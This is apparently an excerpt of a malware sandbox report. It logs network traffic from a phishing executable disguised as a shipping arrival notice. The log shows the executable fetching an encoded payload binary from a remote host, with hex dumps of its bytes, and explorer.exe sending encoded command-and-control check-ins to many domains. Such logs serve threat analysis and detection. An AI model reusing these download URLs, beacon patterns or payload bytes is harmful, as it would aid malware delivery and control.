                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.449828209.99.40.22280C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 22:59:30.761007071 CEST6410OUTGET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.rlmwebcreations.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:59:31.018428087 CEST6411INHTTP/1.1 200 OK
                                    Date: Mon, 13 Sep 2021 20:59:30 GMT
                                    Server: Apache
                                    Set-Cookie: vsid=926vr3791123708943082; expires=Sat, 12-Sep-2026 20:59:30 GMT; Max-Age=157680000; path=/; domain=www.rlmwebcreations.com; HttpOnly
                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_assyLbloNuqAuT9yOs607G/9j2VQECfmj/BBuVcpOg5A+7oWBME12E6QRlSicTWD8nJwG09ixi6T+2IGDnAxzw==
                                    Keep-Alive: timeout=5, max=122
                                    Connection: Keep-Alive
                                    Transfer-Encoding: chunked
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 35 61 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6c 6d 77 65 62 63 72 65 61 74 69 6f 6e 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6c 6d 77 65 62 63 72 65 61 74 69 6f 6e 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6c 6d 77 65 62 63 72 65 61 74 69 6f 6e 73 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 55 6b 5a 69 56 57 77 72 55 7a 52 72 56 7a 42 35 54 30 6c 4e 59 30 4a 52 4d 45 4a 31 56 6d 46 54 56 45 5a 46 53 30 64 71 51 6d 31 53 52 46 4e 34 63 30 46 74 63 33 64 44 63 46 46 6b 62 6b 46 4f 52 56 4e 5a 54 44 56 34 55 6a 4a 68 56 57 55 31 59 55 64 72 4b 32 4a 73 4d 55 70 6a 57 6c 55 77 64 45 56 69 5a 7a 4a 57 4e 57 6c 6c 4c 7a 6c 78 4d 6b 74 47 61 57 73 78 54 6e 6c 49 4e 69 74 54 53 58 6c 42 64 44 42 74 59 54 46 59 5a 46 64 4c 5a 31 5a 78 61 6c 4a 70 53 33 4a 32 59 54 52 6f 55 47 77 35 53 48 6c 33 55 6b 4d 3d 26 62 3d 22 2b 61 62
                                    Data Ascii: 5a8f<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.rlmwebcreations.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.rlmwebcreations.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.rlmwebcreations.com/sk-logabpstatus.php?a=UkZiVWwrUzRrVzB5T0lNY0JRMEJ1VmFTVEZFS0dqQm1SRFN4c0Ftc3dDcFFkbkFORVNZTDV4UjJhVWU1YUdrK2JsMUpjWlUwdEViZzJWNWllLzlxMktGaWsxTnlINitTSXlBdDBtYTFYZFdLZ1ZxalJpS3J2YTRoUGw5SHl3UkM=&b="+ab


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    5192.168.2.44982934.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 22:59:51.481781960 CEST6435OUTGET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.beckyhartpcpublishers.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:59:51.597714901 CEST6436INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Mon, 13 Sep 2021 20:59:51 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "6139ed55-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    6192.168.2.44983091.195.240.11780C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 23:00:34.279469013 CEST6437OUTGET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.microsoftjob.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 23:00:34.313590050 CEST6437INHTTP/1.1 403 Forbidden
                                    Date: Mon, 13 Sep 2021 21:00:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Pragma: no-cache
                                    Last-Modified: Mon, 13 Sep 2021 21:00:34 GMT
                                    X-Cache-Miss-From: parking-686859db59-mzj7x
                                    Server: NginX
                                    Data Raw: 33 35 0d 0a 54 68 65 20 63 6f 6e 74 65 6e 74 20 6f 66 20 74 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 0a 3c 21 2d 2d 62 33 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 35The content of the page cannot be displayed...b3-->0


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    7192.168.2.449831142.111.236.680C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 23:00:54.854407072 CEST6438OUTGET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.wxsjykj.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 23:00:55.025338888 CEST6439INHTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Mon, 13 Sep 2021 21:01:26 GMT
                                    Content-Type: text/html
                                    Content-Length: 146
                                    Connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    8192.168.2.44983254.65.172.380C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 13, 2021 23:01:15.723453045 CEST6439OUTGET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.acooll.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 23:01:15.978889942 CEST6441INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Mon, 13 Sep 2021 21:01:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Data Raw: 61 32 62 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 77 77 77 2e 61 63 6f 6f 6c 6c 2e 63 6f 6d 20 69 73 20 45 78 70 69 72 65 64 20 6f 72 20 53 75 73 70 65 6e 64 65 64 2e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 2e 67 72 61 64 69 65 6e 74 20 7b 0a 09 09 09 66 69 6c 74 65 72 3a 20 6e 6f 6e 65 3b 0a 09 09 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 21 2d 2d 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 6c 61 63 6b 62 6f 61 72 64 22 3e 2d 2d 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 74 6f 6b 79 6f 31 22 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 3f 61 64 72 65 66 3d 6e 73 65 78 70 5f 61 64 26 61 72 67 75 6d 65 6e 74 3d 44 4c 48 74 73 72 67 7a 26 64 6d 61 69 3d 61 35 62 35 61 38 30 39 31 36 38 38 38 36 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 63 6c 61 73 73 3d 22 62 6e 72 4c 69 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 63 6f 6d 6d 6f 6e 2f 69 6d 67 2f 62 6e 72 2f 63 6f 6c 6f 72 66 75 6c 62 6f 78 5f 62 6e 72 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 76 61 6c 69 64 22 3e 0a 09 3c 68 31 3e 0a 09 09 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 69 6d 67 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 0a 09 09 3c 70 3e e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 2f 70 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 3e 0a 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 30 31 22 3e e3 80 8c 20 3c 73 70 61 6e 3e 77 77 77 2e 61 63 6f 6f 6c 6c 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 e3 80 8d e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 af e3 80 81 e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 62 72 3e e3 82 a6 e3 82 a7 e3 83 96 e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 e3 81 ae e6 96 b9 e3 81 af 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 61 6c 75 65 2d 64 6f 6d 61 69 6e 2e 63 6f 6d 2f 6d 6f 64 61 6c 6c 2e 70 68 70 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e e3 81 93 e3 81 a1 e3 82 89 e3 81 8b e3 82 89 e5 a4 89 e6 9b b4 e3 83 bb e6 9b b4 e6 96 b0 3c 2f 61 3e e3 82 92 e8 a1 8c e3 81 a3 e3 81 a6 e3 81 8f e3 81 a0 e3 81 95 e3 81 84 e3 80 82 3c 2f
                                    Data Ascii: a2b<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>www.acooll.com is Expired or Suspended.</title><link rel="stylesheet" type="text/css" href="style.css"><meta name="robots" content="noindex" />...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]--></head>...<body class="blackboard">--><body class="tokyo1"><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink" rel="nofollow"><img src="https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png" alt=""></a><div class="invalid"><h1><img src="img/img01.png" alt=""><p></p></h1><div><p class="txt01"> <span>www.acooll.com</span> <br><a href="https://www.value-domain.com/modall.php" target="_blank" rel="nofollow"></a></


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.44981791.184.0.38443C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    TimestampkBytes transferredDirectionData
                                    2021-09-13 20:56:57 UTC0OUTGET /bin_fDiyu115.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Host: www.paulassinkarchitect.nl
                                    Cache-Control: no-cache
                                    2021-09-13 20:56:57 UTC0INHTTP/1.1 200 OK
                                    Server: nginx/1.20.1
                                    Date: Mon, 13 Sep 2021 20:56:57 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 185920
                                    Last-Modified: Mon, 13 Sep 2021 14:04:24 GMT
                                    Connection: close
                                    ETag: "613f5a68-2d640"
                                    Accept-Ranges: bytes
                                    2021-09-13 20:56:57 UTC0INData Raw: 96 a6 db b3 41 bb d8 e5 d5 52 0a ea 5d 8c e4 0d 96 1b 3d 90 34 26 bd ae a7 01 07 bc 56 18 51 c8 9c 82 18 20 00 93 1a 8b 1b a4 7e cb 06 7b d2 72 8c d0 d6 08 02 1a a2 b2 b6 96 11 df 9d 40 6e ee 08 dc 32 79 09 dc 36 51 b9 07 71 3c 8e 94 a3 38 cb c2 9d dc cf 5e 3a 83 59 30 e6 46 fb 23 0b 88 00 1b d9 6e dd bd d9 4f 99 ea 0f e4 3a fd 0f 3e 7d 5f 27 2b f4 74 04 8f ec 42 8e 62 b5 09 ac 91 bd aa 95 7a 6a 6e 7b b0 72 00 cf 83 aa b4 01 23 83 e6 ce e3 bd 82 78 9f 48 93 40 1a ce f8 06 b4 09 9a 35 70 ee 37 82 7f 8c ef 20 08 72 b0 48 7a 5e 46 a3 ad 3d 07 4f 03 77 fc 99 c6 5f dc 5c 96 97 1c 1d fe af 6f df 73 60 81 e6 a2 28 03 06 55 e7 91 00 d4 05 10 b3 6c 4f c0 ee cd 4d f9 20 1b 3c 73 82 ed 19 62 cb 09 8e 71 30 d3 3b 46 c4 fd e5 0f 37 2b 9f 63 7b d3 03 91 ec c1 90 f1 3a
                                    Data Ascii: AR]=4&VQ ~{r@n2y6Qq<8^:Y0F#nO:>}_'+tBbzjn{r#xH@5p7 rHz^F=Ow_\os`(UlOM <sbq0;F7+c{:
                                    2021-09-13 20:56:57 UTC16INData Raw: c0 4e 8a c9 4a bf 7f 6d e1 d8 1c 9c 57 50 ae a7 b0 81 31 8c 86 1e 75 b7 2b 7a 8b 61 61 d7 fc 0d 0b ed b6 11 12 c7 7f 92 d6 b2 45 7c 1a 26 4c 1b f2 af 18 08 8c ce 30 14 6e eb 33 3d 53 40 50 97 d3 0b 51 07 5e cd d5 c1 7a c0 78 22 e7 07 62 d8 78 3b d5 d0 2f 04 6f a8 4c d4 59 a9 eb 7c a7 97 f5 61 81 48 10 0a 4d 1e c2 8c db 47 10 05 59 1f 65 de 43 42 77 1f f9 1e 68 04 65 67 19 32 f1 b8 26 2c fb e0 51 87 5f b2 62 12 ae 32 cb 67 35 7b 67 f8 e2 2d 02 82 fb 0f 02 c5 45 d3 06 e5 27 83 66 c5 e1 e6 12 ff 83 bd 3a 43 48 95 02 bf e7 d0 8c ef 6e b1 72 66 2d 3c e8 f4 d5 29 69 f9 8f 19 ae cd fc 70 9f 12 fe 5d 11 f3 a4 4b 80 ba 0b ae 58 1a f7 fe 0f 5d 93 54 7c 5c 02 bd bc ee 17 c5 78 06 3f 3f f8 39 e2 48 74 fb d3 00 a5 49 07 75 b1 fc 04 ea e4 14 24 7e bb dc d4 70 3c fa 23
                                    Data Ascii: NJmWP1u+zaaE|&L0n3=S@PQ^zx"bx;/oLY|aHMGYeCBwheg2&,Q_b2g5{g-E'f:CHnrf-<)ip]KX]T|\x??9HtIu$~p<#
                                    2021-09-13 20:56:57 UTC32INData Raw: a3 d3 e3 4c db ac 67 8d 7e 42 4b cb b3 3e 9a 97 de 83 87 e5 ab 00 6b c1 df e0 9f dd 1d d8 b6 98 bf 3f e2 91 28 8b 3b 11 2b d3 c3 d1 da 31 c9 01 c4 78 a9 63 7f f1 27 97 b6 59 85 35 ff c7 90 1b 59 cc d1 16 0a 1d c9 f5 08 c6 48 10 0a 4d 26 c6 0f 26 7a 9a 52 56 7b 4d f8 e9 7e 0d 5c 44 34 60 6d 11 67 10 b4 75 3e 6b 20 c0 b6 77 d6 3a 84 b2 42 45 b5 82 26 92 ee 32 10 95 51 03 b1 b8 95 53 6c ca bd 8d 98 2b 0a 48 c9 fa 70 5c 91 3b ea d2 83 3f ca 5f 16 f2 cc e7 4a f6 4a a6 48 3c a8 04 1d 39 6b b6 f4 c2 1e 9d 1f 7c fa ea 13 fe 88 12 9e cb ae b8 e2 0b 69 1d 63 08 c2 77 5d 54 1e 0c 68 03 d8 bc ac 92 32 91 3e 63 3f 9e da b7 de 98 1f 6c 95 ed c2 42 2d d4 dd 94 9c c8 16 a9 e0 1a 98 d0 fb e1 31 3e f2 73 57 5b 20 49 c7 3c f0 74 4e 3c fd 06 f7 58 ef 5f f0 10 8e 02 94 8d f7
                                    Data Ascii: Lg~BK>k?(;+1xc'Y5YHM&&zRV{M~\D4`mgu>k w:BE&2QSl+Hp\;?_JJH<9k|icw]Th2>c?lB-1>sW[ I<tN<X_
                                    2021-09-13 20:56:57 UTC48INData Raw: ca f6 dd 14 a8 b5 90 31 47 ae ad 79 b6 d1 3b 1f ff c2 5a 1c fd a1 55 4c fe 9d 7b 7f 99 77 d4 e0 b1 4d c9 00 6f d4 d9 41 49 2e 62 9d 32 c5 77 29 16 4d 3d 88 89 8d 8f 0b f3 37 61 4e 10 48 8d f7 e3 eb 60 ea ab e9 14 f9 bd 7f c6 5c 08 05 26 2c 12 24 21 de 8c a4 19 a6 18 f5 7e 26 e0 7c bf fc 16 bd 57 d1 4b 0b 58 f8 2b 84 56 5c 62 6f 87 80 5d 70 57 69 0a ae 26 0a 7a 64 8a 90 4f 35 c9 72 3e 59 1d 9f 69 23 65 d3 79 15 e4 2e 5f 8e aa cc 14 5d 9d 1b 94 ab 83 33 a6 29 47 4e 80 76 32 e7 27 4b 59 55 7b 2f 24 e3 fc 3e 78 4f 5c 32 79 e5 4b 27 75 06 4e 70 fd f0 c0 98 ed 49 57 cd dc f9 ac 65 67 d0 a1 69 d6 de 5f a8 34 8a c3 d9 11 97 43 a1 5e 1d 20 7b 24 a2 04 26 12 7c 58 cd d6 cc 08 52 01 3c 61 2f 1e c8 b4 9b 63 ea 36 d7 aa 61 00 6a 45 d6 1d 2b 8b dc 61 02 51 11 7c d4 87
                                    Data Ascii: 1Gy;ZUL{wMoAI.b2w)M=7aNH`\&,$!~&|WKX+V\bo]pWi&zdO5r>Yi#ey._]3)GNv2'KYU{/$>xO\2yK'uNpIWegi_4C^ {$&|XR<a/c6ajE+aQ|
                                    2021-09-13 20:56:57 UTC64INData Raw: 22 ec 03 92 27 87 dc 6b 58 da 9b 6f a8 e2 09 9d 87 fe b4 9f 3a e2 aa 3a 59 9b 1f f5 05 4f 09 28 b8 64 74 71 43 8d a6 de bf d8 cd b0 83 8f 85 86 98 c2 e2 9d 26 e3 d3 6e 63 e1 95 59 07 c1 78 be 39 c2 1d cc 29 34 9b d0 d5 88 0f 24 36 f1 50 ca 2e 5e 28 d8 7c 5e 4e 20 9d ed 6a 7c ba 80 d3 69 7c ca 4a e3 b8 07 52 36 4c e5 99 e2 b6 b4 63 2a 80 b1 2d 5f a7 19 cd 14 fd 10 79 fa 53 90 37 77 78 f5 4b 88 41 52 c2 f8 bf e8 b5 ed e3 f8 1c 88 38 e0 96 28 35 7f fa 12 55 f2 de b7 d6 22 26 04 7c 65 fe 07 25 64 d0 5b ca 0c 4b 11 e0 93 85 59 f5 e5 88 48 5b 2b 55 13 a1 8d 0d 7d f6 b1 1a 48 54 ed 2e 58 f1 3e 75 fc fa ad 57 c0 85 9b 08 d1 55 f4 63 73 2f c9 be 09 e1 c8 da 8a d4 1e 57 a3 05 44 a0 0d 84 d6 4d 83 9a b3 fe 16 57 49 c3 44 bc 8e 63 b8 51 ee 04 0b 88 8b 96 81 93 22 42
                                    Data Ascii: "'kXo::YO(dtqC&ncYx9)4$6P.^(|^N j|i|JR6Lc*-_yS7wxKAR8(5U"&|e%d[KYH[+U}HT.X>uWUcs/WDMWIDcQ"B
